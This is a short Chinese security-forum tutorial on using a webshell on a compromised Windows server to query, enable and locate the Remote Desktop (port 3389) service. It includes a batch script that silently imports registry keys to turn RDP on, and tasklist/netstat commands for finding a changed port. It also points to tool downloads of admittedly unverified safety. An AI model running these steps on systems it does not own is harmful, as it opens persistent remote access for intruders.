安全矩阵

 找回密码
 立即注册
搜索
查看: 1973|回复: 0

【文字版】WebShell -- 开启3389服务

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-3-15 22:17:40 | 显示全部楼层 |阅读模式
原文链接:【文字版】WebShell -- 开启3389服务

世间最好的默契,并非是有人懂你说出的故事,而是有人懂你说不出的心事。。。
----  网易云热评
一、查询远程连接的端口
1、命令查询,win7/win10/win2003都可以使用
  1. REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
复制代码

0xd3d转换十进制是3389


2、注册表查询


二、开启3389端口的方法
1、工具开启

2、批处理开启,将下面代码复制到bat文件,双击自行开启远程连接
  1. echo Windows Registry Editor Version 5.00>>3389.reg
  2. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
  3. echo "fDenyTSConnections"=dword:00000000>>3389.reg
  4. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
  5. echo "PortNumber"=dword:00000d3d>>3389.reg
  6. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
  7. echo "PortNumber"=dword:00000d3d>>3389.reg
  8. regedit /s 3389.reg
  9. del 3389.reg
复制代码


三、当3389端口被修改后,如何查找
1、通过大马的读注册表、找到3389端口,然后读取

2、通过大马的cmd命令
tasklist /svc,获取termservice的pid号

再执行netstat -ano查找2684对应的的端口就是远程连接端口

3、通过工具扫描


工具下载方式:
1、关注视频号:之乎者也吧,私信
2、关注公众号:回复20210314
注意:软件均来自网络,不能保证安全性



















回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 23:51 , Processed in 0.012122 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表